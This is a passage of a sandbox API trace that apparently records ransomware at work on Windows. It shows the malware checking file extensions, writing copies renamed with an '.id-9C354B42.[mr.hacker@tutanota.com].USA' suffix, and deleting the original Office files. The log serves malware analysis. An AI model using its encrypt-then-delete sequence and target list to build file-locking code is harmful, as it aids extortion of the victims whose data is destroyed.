[0272.403] lstrlenW (lpString=".7z") returned 3 [0272.403] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1 [0272.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO") returned 71 [0272.403] lstrlenW (lpString=".dbf") returned 4 [0272.403] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1 [0272.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO") returned 71 [0272.404] lstrlenW (lpString=".1cd") returned 4 [0272.404] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1 [0272.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO") returned 71 [0272.404] lstrlenW (lpString=".jpg") returned 4 [0272.404] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1 [0272.404] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0272.404] lstrlenW (lpString="ENVELOPR.DLL") returned 12 [0272.404] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\envelopr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0272.437] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=17288) returned 1 [0272.438] CloseHandle (hObject=0x380) returned 1 [0272.438] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\envelopr.dll")) returned 0x20 [0272.446] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\envelopr.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.455] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\envelopr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL") returned 60 [0272.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL") returned 60 [0272.455] lstrlenW (lpString=".doc") returned 4 [0272.455] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.455] lstrlenW (lpString=".docx") returned 5 [0272.455] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0272.455] lstrlenW (lpString=".pdf") returned 4 [0272.455] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.455] lstrlenW (lpString=".xls") returned 4 [0272.455] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.455] lstrlenW (lpString=".xlsx") returned 5 [0272.455] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0272.455] lstrlenW (lpString=".ppt") returned 4 [0272.455] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL") returned 60 [0272.455] lstrlenW (lpString=".zip") returned 4 [0272.455] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.455] lstrlenW (lpString=".rar") returned 4 [0272.455] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.455] lstrlenW (lpString=".bz2") returned 4 [0272.455] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.455] lstrlenW (lpString=".7z") returned 3 [0272.455] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL") returned 60 [0272.456] lstrlenW (lpString=".dbf") returned 4 [0272.456] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL") returned 60 [0272.456] lstrlenW (lpString=".1cd") returned 4 [0272.456] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL") returned 60 [0272.456] lstrlenW (lpString=".jpg") returned 4 [0272.456] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL") returned 60 [0272.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL") returned 60 [0272.456] lstrlenW (lpString=".doc") returned 4 [0272.456] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.456] lstrlenW (lpString=".docx") returned 5 [0272.456] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0272.456] lstrlenW (lpString=".pdf") returned 4 [0272.456] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.456] lstrlenW (lpString=".xls") returned 4 [0272.456] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.456] lstrlenW (lpString=".xlsx") returned 5 [0272.456] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0272.456] lstrlenW (lpString=".ppt") returned 4 [0272.456] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL") returned 60 [0272.456] lstrlenW (lpString=".zip") returned 4 [0272.456] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.456] lstrlenW (lpString=".rar") returned 4 [0272.456] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.456] lstrlenW (lpString=".bz2") returned 4 [0272.456] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.457] lstrlenW (lpString=".7z") returned 3 [0272.457] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL") returned 60 [0272.457] lstrlenW (lpString=".dbf") returned 4 [0272.457] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL") returned 60 [0272.458] lstrlenW (lpString=".1cd") returned 4 [0272.458] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL") returned 60 [0272.458] lstrlenW (lpString=".jpg") returned 4 [0272.458] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.458] lstrcmpiW (lpString1=".HXC", lpString2=".USA") returned -1 [0272.458] lstrlenW (lpString="EXCEL.DEV_COL.HXC") returned 17 [0272.458] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0273.064] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=641) returned 1 [0273.072] CloseHandle (hObject=0x3ac) returned 1 [0273.072] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_col.hxc")) returned 0x20 [0273.091] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_col.hxc.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0273.127] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.127] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.127] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_col.hxc.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0273.981] GetLastError () returned 0x0 [0273.981] ReadFile (in: hFile=0x39c, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x281, lpOverlapped=0x0) returned 1 [0273.983] WriteFile (in: hFile=0x3c0, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x290, lpOverlapped=0x0) returned 1 [0273.984] ReadFile (in: hFile=0x39c, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.984] WriteFile (in: hFile=0x3c0, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xf6, lpOverlapped=0x0) returned 1 [0273.984] SetEndOfFile (hFile=0x3c0) returned 1 [0273.984] CloseHandle (hObject=0x3c0) returned 1 [0273.984] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.984] SetEndOfFile (hFile=0x39c) returned 1 [0273.986] CloseHandle (hObject=0x39c) returned 1 [0273.986] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.991] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_col.hxc")) returned 1 [0273.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC") returned 65 [0273.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC") returned 65 [0273.991] lstrlenW (lpString=".doc") returned 4 [0273.991] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1 [0273.991] lstrlenW (lpString=".docx") returned 5 [0273.991] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1 [0273.992] lstrlenW (lpString=".pdf") returned 4 [0273.992] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1 [0273.992] lstrlenW (lpString=".xls") returned 4 [0273.992] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1 [0273.992] lstrlenW (lpString=".xlsx") returned 5 [0273.992] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1 [0273.992] lstrlenW (lpString=".ppt") returned 4 [0273.992] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1 [0273.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC") returned 65 [0273.992] lstrlenW (lpString=".zip") returned 4 [0273.992] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1 [0273.992] lstrlenW (lpString=".rar") returned 4 [0273.992] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1 [0273.992] lstrlenW (lpString=".bz2") returned 4 [0273.992] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1 [0273.992] lstrlenW (lpString=".7z") returned 3 [0273.992] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1 [0273.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC") returned 65 [0273.992] lstrlenW (lpString=".dbf") returned 4 [0273.992] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1 [0273.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC") returned 65 [0273.992] lstrlenW (lpString=".1cd") returned 4 [0273.992] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1 [0273.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC") returned 65 [0273.993] lstrlenW (lpString=".jpg") returned 4 [0273.993] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1 [0273.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC") returned 65 [0273.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC") returned 65 [0273.993] lstrlenW (lpString=".doc") returned 4 [0273.993] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1 [0273.993] lstrlenW (lpString=".docx") returned 5 [0273.993] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1 [0273.993] lstrlenW (lpString=".pdf") returned 4 [0273.993] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1 [0273.993] lstrlenW (lpString=".xls") returned 4 [0273.993] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1 [0273.993] lstrlenW (lpString=".xlsx") returned 5 [0273.993] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1 [0273.993] lstrlenW (lpString=".ppt") returned 4 [0273.993] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1 [0273.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC") returned 65 [0273.993] lstrlenW (lpString=".zip") returned 4 [0273.993] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1 [0273.993] lstrlenW (lpString=".rar") returned 4 [0273.993] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1 [0273.993] lstrlenW (lpString=".bz2") returned 4 [0273.993] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1 [0273.993] lstrlenW (lpString=".7z") returned 3 [0273.993] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1 [0273.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC") returned 65 [0273.993] lstrlenW (lpString=".dbf") returned 4 [0273.993] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1 [0273.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC") returned 65 [0273.993] lstrlenW (lpString=".1cd") returned 4 [0273.994] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1 [0273.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC") returned 65 [0273.994] lstrlenW (lpString=".jpg") returned 4 [0273.994] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1 [0273.994] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0273.994] lstrlenW (lpString="GRLEX.DLL") returned 9 [0273.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grlex.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0273.999] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=12672) returned 1 [0273.999] CloseHandle (hObject=0x3c0) returned 1 [0273.999] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grlex.dll")) returned 0x20 [0273.999] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grlex.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.999] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grlex.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0274.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL") returned 57 [0274.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL") returned 57 [0274.000] lstrlenW (lpString=".doc") returned 4 [0274.000] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0274.000] lstrlenW (lpString=".docx") returned 5 [0274.000] lstrcmpiW (lpString1=".docx", lpString2="X.DLL") returned -1 [0274.000] lstrlenW (lpString=".pdf") returned 4 [0274.000] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0274.000] lstrlenW (lpString=".xls") returned 4 [0274.000] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0274.000] lstrlenW (lpString=".xlsx") returned 5 [0274.000] lstrcmpiW (lpString1=".xlsx", lpString2="X.DLL") returned -1 [0274.000] lstrlenW (lpString=".ppt") returned 4 [0274.000] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0274.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL") returned 57 [0274.000] lstrlenW (lpString=".zip") returned 4 [0274.000] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0274.000] lstrlenW (lpString=".rar") returned 4 [0274.000] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0274.000] lstrlenW (lpString=".bz2") returned 4 [0274.000] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0274.000] lstrlenW (lpString=".7z") returned 3 [0274.000] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0274.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL") returned 57 [0274.000] lstrlenW (lpString=".dbf") returned 4 [0274.000] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0274.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL") returned 57 [0274.000] lstrlenW (lpString=".1cd") returned 4 [0274.000] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0274.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL") returned 57 [0274.000] lstrlenW (lpString=".jpg") returned 4 [0274.000] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0274.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL") returned 57 [0274.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL") returned 57 [0274.001] lstrlenW (lpString=".doc") returned 4 [0274.001] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0274.001] lstrlenW (lpString=".docx") returned 5 [0274.001] lstrcmpiW (lpString1=".docx", lpString2="X.DLL") returned -1 [0274.001] lstrlenW (lpString=".pdf") returned 4 [0274.001] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0274.001] lstrlenW (lpString=".xls") returned 4 [0274.001] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0274.001] lstrlenW (lpString=".xlsx") returned 5 [0274.001] lstrcmpiW (lpString1=".xlsx", lpString2="X.DLL") returned -1 [0274.001] lstrlenW (lpString=".ppt") returned 4 [0274.001] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0274.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL") returned 57 [0274.001] lstrlenW (lpString=".zip") returned 4 [0274.001] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0274.001] lstrlenW (lpString=".rar") returned 4 [0274.001] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0274.001] lstrlenW (lpString=".bz2") returned 4 [0274.001] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0274.001] lstrlenW (lpString=".7z") returned 3 [0274.001] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0274.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL") returned 57 [0274.001] lstrlenW (lpString=".dbf") returned 4 [0274.001] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0274.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL") returned 57 [0274.001] lstrlenW (lpString=".1cd") returned 4 [0274.001] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0274.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL") returned 57 [0274.001] lstrlenW (lpString=".jpg") returned 4 [0274.002] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0274.002] lstrcmpiW (lpString1=".HXS", lpString2=".USA") returned -1 [0274.002] lstrlenW (lpString="GROOVE.HXS") returned 10 [0274.002] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0274.003] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=2278416) returned 1 [0274.003] CloseHandle (hObject=0x3c0) returned 1 [0274.007] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove.hxs")) returned 0x20 [0274.007] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove.hxs.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.007] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove.hxs.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0274.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58 [0274.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58 [0274.007] lstrlenW (lpString=".doc") returned 4 [0274.007] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1 [0274.007] lstrlenW (lpString=".docx") returned 5 [0274.007] lstrcmpiW (lpString1=".docx", lpString2="E.HXS") returned -1 [0274.007] lstrlenW (lpString=".pdf") returned 4 [0274.007] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1 [0274.007] lstrlenW (lpString=".xls") returned 4 [0274.007] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1 [0274.007] lstrlenW (lpString=".xlsx") returned 5 [0274.007] lstrcmpiW (lpString1=".xlsx", lpString2="E.HXS") returned -1 [0274.007] lstrlenW (lpString=".ppt") returned 4 [0274.008] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1 [0274.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58 [0274.008] lstrlenW (lpString=".zip") returned 4 [0274.008] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1 [0274.008] lstrlenW (lpString=".rar") returned 4 [0274.008] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1 [0274.008] lstrlenW (lpString=".bz2") returned 4 [0274.008] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1 [0274.008] lstrlenW (lpString=".7z") returned 3 [0274.008] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1 [0274.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58 [0274.008] lstrlenW (lpString=".dbf") returned 4 [0274.008] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1 [0274.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58 [0274.008] lstrlenW (lpString=".1cd") returned 4 [0274.008] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1 [0274.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58 [0274.008] lstrlenW (lpString=".jpg") returned 4 [0274.008] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1 [0274.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58 [0274.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58 [0274.008] lstrlenW (lpString=".doc") returned 4 [0274.008] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1 [0274.008] lstrlenW (lpString=".docx") returned 5 [0274.008] lstrcmpiW (lpString1=".docx", lpString2="E.HXS") returned -1 [0274.008] lstrlenW (lpString=".pdf") returned 4 [0274.008] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1 [0274.008] lstrlenW (lpString=".xls") returned 4 [0274.008] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1 [0274.008] lstrlenW (lpString=".xlsx") returned 5 [0274.009] lstrcmpiW (lpString1=".xlsx", lpString2="E.HXS") returned -1 [0274.009] lstrlenW (lpString=".ppt") returned 4 [0274.009] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1 [0274.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58 [0274.009] lstrlenW (lpString=".zip") returned 4 [0274.009] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1 [0274.009] lstrlenW (lpString=".rar") returned 4 [0274.009] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1 [0274.009] lstrlenW (lpString=".bz2") returned 4 [0274.009] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1 [0274.009] lstrlenW (lpString=".7z") returned 3 [0274.009] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1 [0274.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58 [0274.009] lstrlenW (lpString=".dbf") returned 4 [0274.009] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1 [0274.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58 [0274.009] lstrlenW (lpString=".1cd") 